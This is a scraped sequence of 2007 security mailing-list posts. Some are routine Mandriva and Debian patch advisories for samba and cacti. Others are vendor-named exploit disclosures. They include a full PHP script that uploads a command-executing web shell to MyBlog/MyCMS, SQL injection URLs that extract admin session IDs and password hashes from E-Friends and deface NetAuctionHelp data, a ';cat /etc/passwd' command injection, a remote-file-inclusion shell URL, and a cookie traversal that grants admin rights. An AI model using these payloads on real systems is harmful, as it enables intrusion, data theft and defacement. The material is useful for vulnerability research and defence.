[ MDKSA-2007:224-1 ] - Updated samba packages fix vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:224-1 http://www.mandriva.com/security/ ___ Package : samba Date: November 21, 2007 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0 ___ Problem Description: The samba developers discovered that nmbd could be made to overrun a buffer during the processing of GETDC logon server requests. If samba is configured as a Primary or Backup Domain Controller, this could be used by a remote attacker to send malicious logon requests and possibly cause a denial of service (CVE-2007-4572). As well, Alin Rad Pop of Secunia Research found that nmbd did not properly check the length of netbios packets. If samba is configured as a WINS server, this could be used by a remote attacker able to send multiple crafted requests to nmbd, resulting in the execution of arbitrary code with root privileges (CVE-2007-5398). Update: The patch that fixed CVE-2007-4572 introduced a regression that would prevent shares from being mounted properly and would cause the remote (patched) smbd to crash. This update contains another fix from upstream to correct the problem. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5398 https://bugzilla.samba.org/show_bug.cgi?id=5087 ___ Updated Packages: Mandriva Linux 2007.0: 4b52bbf1bcea6c92e5e27e4b3be9921c 2007.0/i586/libsmbclient0-3.0.23d-2.5mdv2007.0.i586.rpm 0e287962bad4921a4eb1fe35e8afa867 2007.0/i586/libsmbclient0-devel-3.0.23d-2.5mdv2007.0.i586.rpm 1f72ecfa1bfb10cfad00514c078fee75 2007.0/i586/libsmbclient0-static-devel-3.0.23d-2.5mdv2007.0.i586.rpm 8e34665453b13707225463e51a17419b 2007.0/i586/mount-cifs-3.0.23d-2.5mdv2007.0.i586.rpm ad4581add35fa10e229dd1d8355009fd 2007.0/i586/nss_wins-3.0.23d-2.5mdv2007.0.i586.rpm 4d4bbca4f9bd6cfb238ee8c1a049a5d1 2007.0/i586/samba-client-3.0.23d-2.5mdv2007.0.i586.rpm f9e7dbb40360dd08db9e3a2bbab1da5a 2007.0/i586/samba-common-3.0.23d-2.5mdv2007.0.i586.rpm 0a45d85d642b6c2f6e75e23c5591b504 2007.0/i586/samba-doc-3.0.23d-2.5mdv2007.0.i586.rpm 05fa226646de72131aa58b829db0c91b 2007.0/i586/samba-server-3.0.23d-2.5mdv2007.0.i586.rpm ca205264e05dd03a396de8ca58b3208f 2007.0/i586/samba-smbldap-tools-3.0.23d-2.5mdv2007.0.i586.rpm 21a749eb15c85acabddb45fa49623f21 2007.0/i586/samba-swat-3.0.23d-2.5mdv2007.0.i586.rpm c9ee96941a97241e0ad030b82996cbec 2007.0/i586/samba-vscan-clamav-3.0.23d-2.5mdv2007.0.i586.rpm 6cb28d4f52ace9ef971d4e531ecee06d 2007.0/i586/samba-vscan-icap-3.0.23d-2.5mdv2007.0.i586.rpm a280f39e86311192d914aaec5b4ada1d 2007.0/i586/samba-winbind-3.0.23d-2.5mdv2007.0.i586.rpm f57636830c90f965ef2f77735535f22f 2007.0/SRPMS/samba-3.0.23d-2.5mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 39b22c9940e00093e38e592b87698a27 2007.0/x86_64/lib64smbclient0-3.0.23d-2.5mdv2007.0.x86_64.rpm 9f8698b5b8f57c040a9ebe2578797043 2007.0/x86_64/lib64smbclient0-devel-3.0.23d-2.5mdv2007.0.x86_64.rpm c4a3f6ef7e926f36dd377d4709e621e6 2007.0/x86_64/lib64smbclient0-static-devel-3.0.23d-2.5mdv2007.0.x86_64.rpm 24d6b769cdc117762b3013b6198e 2007.0/x86_64/mount-cifs-3.0.23d-2.5mdv2007.0.x86_64.rpm b114782608c8f27d05cf9b5120c07a4b 2007.0/x86_64/nss_wins-3.0.23d-2.5mdv2007.0.x86_64.rpm fa7c98956081e2d84c9ccc92273d12a8 2007.0/x86_64/samba-client-3.0.23d-2.5mdv2007.0.x86_64.rpm c05921fb231990a8a69f2c439d1df965 2007.0/x86_64/samba-common-3.0.23d-2.5mdv2007.0.x86_64.rpm f35a2d243f6db6a1b9e17926658adbc2 2007.0/x86_64/samba-doc-3.0.23d-2.5mdv2007.0.x86_64.rpm c11cf53381a514bf769e0ae2f1bfd1d8 2007.0/x86_64/samba-server-3.0.23d-2.5mdv2007.0.x86_64.rpm f589c03f28168ec4cf5903bb400fbaae 2007.0/x86_64/samba-smbldap-tools-3.0.23d-2.5mdv2007.0.x86_64.rpm 96efed0918798808193d2991782583dc 2007.0/x86_64/samba-swat-3.0.23d-2.5mdv2007.0.x86_64.rpm d176d6f29df246de80d93639225eefe9 2007.0/x86_64/samba-vscan-clamav-3.0.23d-2.5mdv2007.0.x86_64.rpm d496a935398d0eb974f2a39367505e6c 2007.0/x86_64/samba-vscan-icap-3.0.23d-2.5mdv2007.0.x86_64.rpm 5f1367f9731082b88dd4155055876d20 2007.0/x86_64/samba-winbind-3.0.23d-2.5mdv2007.0.x86_64.rpm f57636830c90f965ef2f77735535f22f 2007.0/SRPMS/samba-3.0.23d-2.5mdv2007.0.src.rpm Mandriva Linux 2007.1: 14b3343c22199bd8a70e13020dc08e70 2007.1/i586/libsmbclient0-3.0.24-2.4mdv2007.1.i586.rpm 30c1e225dd4cd4b8613d37a003f6686e 2007.1/i586/libsmbclient0-devel-3.0.24-2.4mdv2007.1.i586.rpm 6fffd07522acb0ebf439a6efdc7171d2 2007.1/i586/libsmbclient0-static-devel-3.0.24-2.4mdv2007.1.i586.rpm
Wheatblog (wB) Remote File inclusion ..
Hello,,
Wheatblog (wB) Remote File inclusion ..
tested on 1.1 and older versions are injected
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : [EMAIL PROTECTED]
Remote File Inclusion
file : includes/sessions.php
line 2 :
code:-
include_once($wb_class_dir/classDatabase.php);
variable wb_class_dir can be controlled and edited to be included from remote ..
Solution
replace
code :-
include_once($wb_class_dir/classDatabase.php);
with
code:-
// Protected By : HACKERS PAL
// [EMAIL PROTECTED]
// Http://WwW.SoQoR.NeT
if(eregi(sessions.php,$PHP_SELF) || isset($_GLOBALS['wb_class_dir']))
{
die(h1Forbidden 403br Protected By : HACKERS PAL/h1);
}
include_once($wb_class_dir/classDatabase.php);
Exploit : -
includes/sessions.php?wb_class_dir=[Ev!1-Sh311]?
#WwW.SoQoR.NeT
[ECHO_ADV_85$2007] alstrasoft E-Friends = 4.98 (seid) Multiple Remote SQL Injection Vulnerabilities
ECHO_ADV_85$2007 - [ECHO_ADV_85$2007] alstrasoft E-Friends = 4.98 (seid) Multiple Remote SQL Injection Vulnerabilities - Author : M.Hasran Addahroni Date : November, 15 th 2007 Location : Australia, Sydney Web: http://advisories.echo.or.id/adv/adv85-K-159-2007.txt Critical Lvl : Critical Impact : System access Where : From Remote --- Affected software description: Application : E-Friends version : = 4.98 Vendor: http://www.alstrasoft.com/efriends.htm Description : E-Friends is an online social networking script that allows you to start your own profitable community just like Friendster and MySpace social networking site plus the ability to offer paid membership subscriptions. E-Friends allow members to connect to people in their personal networks and make friends, match making, dating, blogging and join groups and events. Features include email importer, messaging system, classifieds, join groups, forums, affiliate program integrated, online chat, personal blog, calendar, custom profile URL, friends search, invite friends, hotornot image ranking, advance admin control panel, upload photos and many more. --- Vulnerability: ~~ Input passed to the seid parameter in events modules is not properly verified before being used to sql query. This can be exploited thru the browser and get the hash md5 password from members and retrieve admin session id. Successful exploitation requires that magic_quotes is off. Poc/Exploit: ~~ 1.Retrieve Admin SessionID : http://target.com/index.php?mode=eventsact=vieweventseid=-1%20union%20select%201,2,3,sess_id,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20admin-- Use the SessionID in this URL: http://target.com/admin.php?mode=users_manageradsess=SESSION_ID 2.Get Members's Username and md5 hash: http://target.org/index.php?mode=eventsact=vieweventseid=-1%20union%20select%201,2,3,concat(mem_id,0x3a,username,0x3a,email,0x3a,password,0x3a,fname),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20members-- Dork: ~ Google : JOIN OUR SITE Today. It's FREE! Solution: ~~~ - Edit the source code to ensure that input is properly verified. - Turn on magic_quotes in php.ini Timeline: ~ - 15 -11 - 2007 bug found - 21 -11 - 2007 vendor contacted - 22 -11 - 2007 publish advisory --- Shoutz: ~ ~ ping - my dearest wife, 'zizou' zautha - my lovely son, for all the luv, the tears n the breath ~ y3dips,the_day,m0by,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v, az01,negative,the_hydra,neng chika, str0ke ~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw ~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry,ketut,x16 ~ [EMAIL PROTECTED] ~ #aikmel #e-c-h-o @irc.dal.net --- Contact: ~~ K-159 || echo|staff || eufrato[at]gmail[dot]com Homepage: http://k-159.echo.or.id/ [ EOF ] --
Remote Shell Command Execution in KB-Bestellsystem (amensa-soft.de)
KB-Bestellsystem is a domain order system written in Perl. The domain and tld parameters in kb_whois.cgi are not filtering shell metacharacters. The following examples will show you the /etc/passwd file: http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_ownerdomain=;cat%20/etc/passwd;tld=.comtarrif= http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_ownerdomain=googletld=.com;cat /etc/passwd;tarrif= Greetz Zero X
Aria-Security.net: NetAuctionHelp SQL Injection
Aria-Security Net Original Advisory @ http://aria-security.net/forum/showthread.php?p=1099 Vendor: http://www.netauctionhelp.com PoC: search.asp?sort=nicategory=categoryname=kwsearch=nsearch=[SQL INJECTION] search.asp?sort=nicategory=categoryname=kwsearch=nsearch='having 1=1-- search.asp?sort=nicategory=categoryname=kwsearch=nsearch=1' or 1=convert(int,@@servername)-- search.asp?sort=nicategory=categoryname=kwsearch=nsearch=1' or 1=convert(int,@@version)-- tblAd.id tblAd.aspectratio tblAd.title tblAd.imagepath tblAd.startdate tblAd.enddate tblAd.id_seller tblAd.descr -1' UPDATE tblAd set descr= 'HACKED' Where(ID= '1');-- this code with update itemdetl.asp?id=1 Credit goes to Aria-Security.Net Greetz: AurA
[Argeniss] Data0: Next generation malware for stealing databases (Paper)
Hey, I'm releasing this new paper, not big deal but interesting. http://www.argeniss.com/research/Data0.pdf Abstract: This paper it's about Data0, a fictitious (or not) simple PoC of new malware that after it's deployed on a computer in an internal network it will automatically hack database servers and steal their data. Several techniques used by Data0 will be detailed. Data0 will be targeting Microsoft SQL Server and Oracle Database Server two of the most used database servers. While Data0 could be used by the bad guys for evil purposes, it could also be used by security professionals and organizations to determine how strong networks, workstations, database servers, etc. are against this kind of attack. This paper is not intended to be a cook book for cyber criminals, it's intended to show people that by implementing simple techniques malware can become smarter and cause a lot more damage in a very near future. Cesar. Never miss a thing. Make Yahoo your home page. http://www.yahoo.com/r/hs
MyBlog (MyCMS) Remote PHP Code execution / PHP Code injection ..
Hello,,
MyBlog (MyCMS) Remote PHP Code execution / PHP Code injection ..
http://sourceforge.net/projects/myblog/
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : [EMAIL PROTECTED]
Exploit : -
#!/usr/bin/php -q -d short_open_tag=on
?
/*
/* MyCMS Command Execution
/* This exploit should allow you to execute commands
/*By : HACKERS PAL
/* WwW.SoQoR.NeT
*/
echo('
/**/
/* MyCmS Command Execution */
/*by HACKERS PAL [EMAIL PROTECTED] */
/* site: http://www.soqor.net */');
if ($argc4) {
print_r('
/* -- */
/* Usage: php '.$argv[0].' host path cmd
/* Example: */
/*php '.$argv[0].' localhost /freewps/ id
/**/
');
die;
}
error_reporting(0);
ini_set(max_execution_time,0);
ini_set(default_socket_timeout,5);
Function get_page($url)
{
if(function_exists(file_get_contents))
{
$contents = file_get_contents($url);
}
else
{
$fp=fopen($url,r);
while($line=fread($fp,1024))
{
$contents=$contents.$line;
}
}
return $contents;
}
function connect($packet)
{
global $host, $port, $html;
$con=fsockopen(gethostbyname($host),$port);
if (!$con)
{
echo '[-] Error - No response from '.$host.':'.$port; die;
}
fputs($con,$packet);
$html='';
while ((!feof($con)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($con,1);
}
GLOBAL $html;
fclose($con);
}
$i=0;
$data=;
function add_data($name,$value,$type=no,$filename)
{
GLOBAL $data,$i;
if($type==file)
{
$data.=-7d62702f250530
Content-Disposition: form-data; name=\$filename\; filename=\$name\;
Content-Type: text/plain
$value
;
}
elseif($type==init)
{
$data.=-7d62702f250530--;
}
elseif($type==clean)
{
$data=;
}
else
{
$data.=-7d62702f250530
Content-Disposition: form-data; name=\$name\;
Content-Type: text/plain
$value
;
}
}
$host=$argv[1];
$path=$argv[2];
$cmd=$argv[3];
$port=80;
$cmd=urlencode($cmd);
$p='http://'.$host.':'.$port.$path;
Echo \n[+] Trying to Upload File;
$cookie=admin=1login=HACKERS%20PAL;
$contents='?php
Echo Shell By : HACKERS PAL :)
bra href=\http://www.soqor.net\;WwW.SoQoR.NeT/abr
;
$cmd=($_GET[cmd])?$_GET[cmd]:$_POST[cmd];
system($cmd);
die();
?';
add_data(,);
add_data(content,$contents);
add_data('','',init);
$packet=POST .$p.admin/settings.php HTTP/1.0\r\n;
$packet.=Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, */*\r\n;
$packet.=Referer: http://.$host.$path.profile.php?mode=editprofile\r\n;;
$packet.=Accept-Language: it\r\n;
$packet.=Content-Type: multipart/form-data;
boundary=---7d62702f250530\r\n;
$packet.=Accept-Encoding: gzip, deflate\r\n;
$packet.=User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
SV1)\r\n;
$packet.=Host: .$host.\r\n;
$packet.=Content-Length: .strlen($data).\r\n;
$packet.=Connection: Close\r\n;
$packet.=Cache-Control: no-cache\r\n;
$packet.=Cookie: .$cookie.\r\n\r\n;
$packet.=$data;
connect($packet);
if (eregi(Main Blog Settings,$html))
{
echo \n[+] Successfully uploaded ...\n[+] Go To
http://.$p.index.php?cmd=$cmd for your own commands.. \n[+] The Result Of The
Command\n;
Echo get_page($p.index.php?cmd=.$cmd);
}
else
{
echo \n[-] Unable to Upload File\n[-] Exploit Failed;
}
echo (\n/* Visit us : WwW.SoQoR.NeT
*/\n/**/);
?
#WwW.SoQoR.NeT
Re: Simple Machines Forum multiple sql injection flaws with exploit code.
Do you know what kind of hash the passwords are stored as? Are they salted?
MySpace Scripts - Poll Creator JavaScript Injection Vulnerability
[HSC]MySpace Scripts - Poll Creator JavaScript Injection Vulnerability Our MySpace Poll Creator script is the ultimate addition to your MySpace resource site. The script enables your user to quickly and easily create a poll that they can post to profile or bulletin to all their friends. Everyone loves to create a poll and gather opinions and this isn't something that's available on every other MySpace resource site. Hackers Center Security Group (http://www.hackerscenter.com) Credit: Doz Risk: Medium Class: Input Validation Error Vendor: http://www.m2scripts.com Product: MySpace Scripts - Poll Creator * Attackers can exploit these issues via a web client. Cross-Site Scripting: http://www.victim.com/poll/index.php/XSS Example of Advance Exploitation of the Application: Once we have found that the application is vulnerable to JavaScript Injection we see that there is a form that will be our source of input to alter page source code the Files. Now we can advance this type of attack by injecting an evil script trough /poll/index.php?action=create_new. Now we can inject any code into the Raw From Box and submit. This will leave a persistent Code on the Server side. Example: http://www.victim.com/poll/index.php?action=create_new Only becoming a Ethical Hacker, you can stop a Hacker. Learn with out having to pay thousands!- http://kit.hackerscenter.com - The most comprehensive security pack you will ever find on the net!
VigileCMS = 1.8 Stealth Remote Command Execution Exploit
Opencosmo Security
http://www.opencosmo.com
http://www.opencosmo.com/news.php?readmore=15
VigileCMS = 1.8 Stealth Remote Command Execution Exploit
Crediti: The:Paradox
Applicazione: VigileCMS
Versione: 1.8
Impatto: Remote Command Execution
Rischio: [3/5]
Exploit: #!/usr/bin/python
#-*- coding: iso-8859-15 -*-
'''
_ _ _
| |_| |_ ___ _ _ __ __ _ _ _ __ _ __| |_ __
| _| ' \/ -_)|_|| '_ \/ _` | '_/ _` / _` / _ \ \ /
\__|_||_\___||_|| .__/\__,_|_| \__,_\__,_\___/_\_\
|_|
This is a Public Exploit. 22/10/2007 (dd-mm-)
§ 0day VigileCMS 1.8 Stealth and maybe lower version - Remote Command
Execution §
Vendor: http://www.vigilenapoletano.it
Severity: Highest
Author: The:Paradox
Italy r0x.
Visit inj3ct-it.org
Comments: This exploit was coded to show some people what a real vulnerability
is.
Related Codes:
--- index.php; line 64:
if (isset($_COOKIE[rem_user]) and isset ($_COOKIE[rem_pass]) and
!isset($_SESSION[user])) {
if(file_exists(USERS_TAB./$_COOKIE[rem_user].$_COOKIE[rem_pass].php)){
$_SESSION[user] = $_COOKIE[rem_user];
$_SESSION[pass] = $_COOKIE[rem_pass];
logthis($_SESSION[user] si è collegato al Sito: riconosciuto con Cookie!);
UserVisita ();// aggiornamento database utente per numero di visite
}
}
--- func.inc.php; line 93:
function is_admin(){ //## FUNCTION ##
if( (isset($_SESSION[user]) and isset($_SESSION[pass]))
(file_exists(ADMIN_TAB./$_SESSION[user].$_SESSION[pass].php)) ){
return true;
} else {
return false;
}
}
--- func.inc.php; line 109:
function is_superadmin(){ //## FUNCTION ##
include (LOGS_TAB./creazione.php);
if (isset($_SESSION[user]) and isset($_SESSION[pass]) and
($_SESSION[user]==$primo_amministra)) {
return true;
} else {
return false;
}
}
--- vedipm.php; line 210:
if ($_POST[ttl] ==) $_POST[ttl]=Nessun oggetto;
$_POST[ttl] =stripslashes($_POST[ttl]);
$_POST[ttl] =htmlspecialchars($_POST[ttl]); // impedisce visualizzazioni
caratteri html e maligni tipo javascript
$_POST[cont]=stripslashes($_POST[cont]);
$_POST[cont]=htmlspecialchars($_POST[cont]); // impedisce visualizzazioni
caratteri html e maligni tipo javascript
$_POST[cont]=str_replace(\r\n,[br],$_POST[cont]);
$_POST[cont]=str_replace(~,|,$_POST[cont]);
$_POST[ttl]=str_replace(~,|,$_POST[ttl]);
$time = time();
$newpm = fopen (PM_TAB./$_POST[to], a);
fwrite ($newpm,
$_POST[ttl]~$_POST[cont]~$_SESSION[user]~$time~non_letto\r\n);
fclose($newpm);
Bug Explanation:
The platform presents some vulnerabilities in the login system and in the
private message sender system.
The first vulnerability is in index.php that verifies the login without sql
database verifying the existence of files with the structure
Nick.HashMD5Password.php in a dir db.
The cms'coder didn't thought about directory transversal. In fact if we try to
login with these cookies:
rem_user = /../users/Nick
rem_pass = HashMD5Password
Where Nick and HashMD5Password are an existent UserName and MD5 Password's
Hash, we'll gain administration rights. This happens because the function
is_admin will check the file existence of
/db/admin/../users/Nick.HashMD5Password.php
Obvious this may work with any file (with some collateral errors because it
missed an include :P)
Whatever this doesn't make us able to do a lot of action in control panel
because we will not have superadmin rights (see is_superadmin() function)
The second vulnerability is in vedipm.php and make us able to write a file on
the server, but we can't get a RCE because our action are limited by
htmlspecialchars that changes characters of php code ( ). Whatever
$_SESSION[user] is not htmlspecialcharsed.
Using the first and the second vulnerability we can gain a RCE. We will create
a file named with php code , with this we'll login and get an evil
$_SESSION[user] that will be written in a php file.
A lot of other Vulnerabilities have been found in this platform, but their
functionality depends by the configuration OFF of MAGIC QUOTES or other uses of
vulnerabilities I explained , so they were not published.
Google Dork- Powered by Cms Vigile
Use this exploit at your own risk. You are responsible for your own deeds.
Not tested on version of 1.6
Using CSRF to Attack Mobile Phones
CSRF can be used to cause denial-of-service attacks against mobile phones by flooding the phone with SMS and service messages. Mobile phone service providers in Israel, and throughout the world, provide a web interface to send SMS messages. Fortunately, they limit the SMS sending web interface to 20 messages per day, and they also require the user to authenticate in order to send an SMS. Unfortunately, at-least when referring to the Israeli providers, they also give attackers a way to send endless SMS and service messages without any kind of authentication and with a simple HTTP request. More information: http://aviv.raffon.net/2007/11/22/UsingCSRFToAttackMobilePhones.aspx
[ MDKSA-2007:231 ] - Updated cacti packages fix SQL injection vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:231 http://www.mandriva.com/security/ ___ Package : cacti Date: November 22, 2007 Affected: Corporate 4.0 ___ Problem Description: An SQL injection vulnerability in cacti may allow remote attackers to execute arbitrary SQL commands. The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6035 ___ Updated Packages: Corporate 4.0: 7747b05a689d987c089670ae2f02d8e1 corporate/4.0/i586/cacti-0.8.6f-3.3.20060mlcs4.noarch.rpm bde23b14c6a6de25adecb10eb87e5c00 corporate/4.0/SRPMS/cacti-0.8.6f-3.3.20060mlcs4.src.rpm Corporate 4.0/X86_64: 14628544bb359a37a58740b082fd14bb corporate/4.0/x86_64/cacti-0.8.6f-3.3.20060mlcs4.noarch.rpm bde23b14c6a6de25adecb10eb87e5c00 corporate/4.0/SRPMS/cacti-0.8.6f-3.3.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFHRb1amqjQ0CJFipgRAgaOAKDJDmFCgplzKC/JCQvE6HZi+HmRvwCfaQ9f TleLUlRzgRRqFncHeHYSz3s= =RAYU -END PGP SIGNATURE-
Gadu-Gadu Local/Remote Buffer Overflow vulnerability
Team Vexillium Security Advisory http://vexillium.org/ Name : Gadu-Gadu Class: Buffer Overflow Threat level : VERY HIGH Discovered : 2007-11-10 Published: 2007-11-22 Credit : j00ru//vx Vulnerable : Gadu-Gadu 7.7 [Build 3669], prior versions may also be affected. ==[ Abstract ]== Gadu-Gadu is a free internet communicator used by milions of polish people. It allows to talk, hear and even see other internauts through the net. It also supports the possibility to express feelings using some provided emoticons. These emoticons' strings with associated graphic filenames are stored in emots.txt file. The GG Client is vulnerable to a buffer overflow attack, in the code that moves the emots.txt file data to some local buffers. The program doesn't check if the size of data to move is not greater than the size of the destination buffer. Successful exploitation may lead to arbitrary code execution or the process' denial of service (gg.exe termination). ==[ Details ]== Function vulnerable to the attack is placed at the 0x00443CE2 address: .text:00443CE2 HandleEmotsConfig proc near ; CODE XREF: sub_4A55F6:loc_4A5C90p .text:00443CE2 mov eax, offset loc_561ECC .text:00443CE7 call__EH_prolog .text:00443CEC mov eax, 26588 .text:00443CF1 call__alloca_probe .text:00443CF6 pushebx .text:00443CF7 lea eax, [ebp-24h] .text:00443CFA pushesi .text:00443CFB pusheax .text:00443CFC callsub_443A9E .text:00443D01 xor esi, esi (...) It is responsible for opening the \emots\_NUMBER_\emots.txt files, and then reading information about emoticons and their graphic equivalents. This is how an exemplary line of configuration file looks like: (emoticon,emoticon,...),graphic_file.gif,graphic_file.gif If there's only one string associated to a gif file, the brackets can be skipped. Also the third part of line isn't essential - it's just the name of optional graphic file in NETSCAPE GIF format. During the process of copying data from currently opened file (2nd and 3rd part of configuration line) to some local buffers, the program doesn't check the strings' lengths, what can lead to overwriting the 500-byte buffers placed on the stack. Vulnerable code that copies the name of first gfx file is shown below: .text:00443E37 loc_443E37: ; CODE XREF: HandleEmotsConfig+164j .text:00443E37 cmp al, '' .text:00443E39 jz short loc_443E48 .text:00443E3B mov [ecx], al .text:00443E3D inc ecx .text:00443E3E inc edi .text:00443E3F mov [ebp-18h], edi .text:00443E42 .text:00443E42 loc_443E42: ; CODE XREF: HandleEmotsConfig+153j .text:00443E42 mov al, [edi] .text:00443E44 cmp al, 20h .text:00443E46 jnb short loc_443E37 As you can see, there's no size limitation of the data being moved. It's, in fact, the same situation in the second piece of code: .text:00443E87 loc_443E87: ; CODE XREF: HandleEmotsConfig+1B6j .text:00443E87 cmp cl, '' .text:00443E8A jz short loc_443E9F .text:00443E8C mov [eax], cl .text:00443E8E inc eax .text:00443E8F inc edi .text:00443E90 .text:00443E90 loc_443E90: ; CODE XREF: HandleEmotsConfig+1A3j .text:00443E90 mov cl, [edi] .text:00443E92 cmp cl, ' ' .text:00443E95 mov [ebp-18h], edi .text:00443E98 jnb short loc_443E87 A Proof of Concept file created during this research exploits bugs in filename copying code, but it is also possible to execute arbitrary code using an buffer overflow in other places in the fuction - responsible for moving data such as strings describing the emoticons and so on. When copying data using code shown above, the values of some local variables, return addresses etc. may be overwritten. Modification of proper amount of stack data causes an exception. There are several reasons for the exception being generated. It can happen when the filename placed in emots.txt is longer than the size of stack, or in a function under 0x0052F5D0 address, called by the emoticon parsing code: .text:00443EEE callunknown_libname_52 ; Microsoft VisualC 2-8/net runtime to be more precise, the instruction under 0x0052F62A causes an exception, because of the fact that EDI register value is zero in that moment: .text:0052F62A rep movsd Among all the data we are able to
[SECURITY] [DSA 1409-1] New samba packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory 1409[EMAIL PROTECTED] http://www.debian.org/security/ Steve Kemp November 22, 2007 http://www.debian.org/security/faq - Package: samba Vulnerability : several Problem type : remote Debian-specific: no CVE Id(s) : CVE-2007-4572, CVE-2007-5398 Several local/remote vulnerabilities have been discovered in samba, a LanManager-like file and printer server for Unix. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2007-5398 Alin Rad Pop of Secunia Research discovered that nmbd did not properly check the length of netbios packets. When samba is configured as a WINS server, a remote attacker could send multiple crafted requests resulting in the execution of arbitrary code with root privileges. CVE-2007-4572 Samba developers discovered that nmbd could be made to overrun a buffer during the processing of GETDC logon server requests. When samba is configured as a Primary or Backup Domain Controller, a remote attacker could send malicious logon requests and possibly cause a denial of service. For the stable distribution (etch), these problems have been fixed in version 3.0.24-6etch5. For the old stable distribution (sarge), these problems have been fixed in version 3.0.14a-3sarge7. For the unstable distribution (sid), these problems have been fixed in version 3.0.27-1. We recommend that you upgrade your samba packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/s/samba/samba_3.0.14a-3sarge7.diff.gz Size/MD5 checksum: 126599 dd69715fbe533f86261dba9c6df4121b http://security.debian.org/pool/updates/main/s/samba/samba_3.0.14a.orig.tar.gz Size/MD5 checksum: 15605851 ebee37e66a8b5f6fd328967dc09088e8 http://security.debian.org/pool/updates/main/s/samba/samba_3.0.14a-3sarge7.dsc Size/MD5 checksum: 1081 9d0458572d346c0007f5ad69f5884f0d Architecture independent packages: http://security.debian.org/pool/updates/main/s/samba/samba-doc_3.0.14a-3sarge7_all.deb Size/MD5 checksum: 12117138 fddb40f38a2fa55babbb4dc80c5fc67b alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.0.14a-3sarge7_alpha.deb Size/MD5 checksum: 660190 52f63b13c5a43948920c686767178471 http://security.debian.org/pool/updates/main/s/samba/samba-dbg_3.0.14a-3sarge7_alpha.deb Size/MD5 checksum: 20269910 1ceef52818b1beedf40bd4da1c510a93 http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.0.14a-3sarge7_alpha.deb Size/MD5 checksum: 402276 41642d0e295f9fbbeea6a7325b305096 http://security.debian.org/pool/updates/main/s/samba/swat_3.0.14a-3sarge7_alpha.deb Size/MD5 checksum: 4223920 5231db946b3527c24c860a9100819b6e http://security.debian.org/pool/updates/main/s/samba/winbind_3.0.14a-3sarge7_alpha.deb Size/MD5 checksum: 1824694 b9e8dd0b3eeefa6aac54648290506520 http://security.debian.org/pool/updates/main/s/samba/samba_3.0.14a-3sarge7_alpha.deb Size/MD5 checksum: 3129116 cc5b557ba1ae5b2fd791215e782db96b http://security.debian.org/pool/updates/main/s/samba/smbclient_3.0.14a-3sarge7_alpha.deb Size/MD5 checksum: 3251528 8e835a384359a4662beae0f84de0b396 http://security.debian.org/pool/updates/main/s/samba/python2.3-samba_3.0.14a-3sarge7_alpha.deb Size/MD5 checksum: 5238590 0185e710feb3e56007be537744db93fe http://security.debian.org/pool/updates/main/s/samba/samba-common_3.0.14a-3sarge7_alpha.deb Size/MD5 checksum: 2409008 46477a46365492bcb50610eadf5b2758 http://security.debian.org/pool/updates/main/s/samba/smbfs_3.0.14a-3sarge7_alpha.deb Size/MD5 checksum: 459612 f013c425117b90a440b9670204d062ad http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.0.14a-3sarge7_alpha.deb Size/MD5 checksum: 1015522 7cceff444f8053c998e307d0e3bbd0ba arm architecture (ARM) http://security.debian.org/pool/updates/main/s/samba/smbclient_3.0.14a-3sarge7_arm.deb Size/MD5 checksum: 2599536 8ae40ec58f87a12bd2101132fa1dde9a http://security.debian.org/pool/updates/main/s/samba/winbind_3.0.14a-3sarge7_arm.deb Size/MD5 checksum: 1484914 6795a1c5c38080bb7402d70745e396bc
Re: Gadu-Gadu Local/Remote Buffer Overflow vulnerability
Hello, 1. you didn't wrote OS specification. It was Win XP or Vista? Which language? It was fully patched? DEP was turned on? Have you tried on privileged user? 2. Why did you wrote VERY HIGH threat? This is local buffer overflow. Moreover user has to replace original file. This vulnerability has more to do with SE :(. 3. I haven't debug this overflow event, could you tell me, how much bytes can you parse? Nice find. Cheers, JD
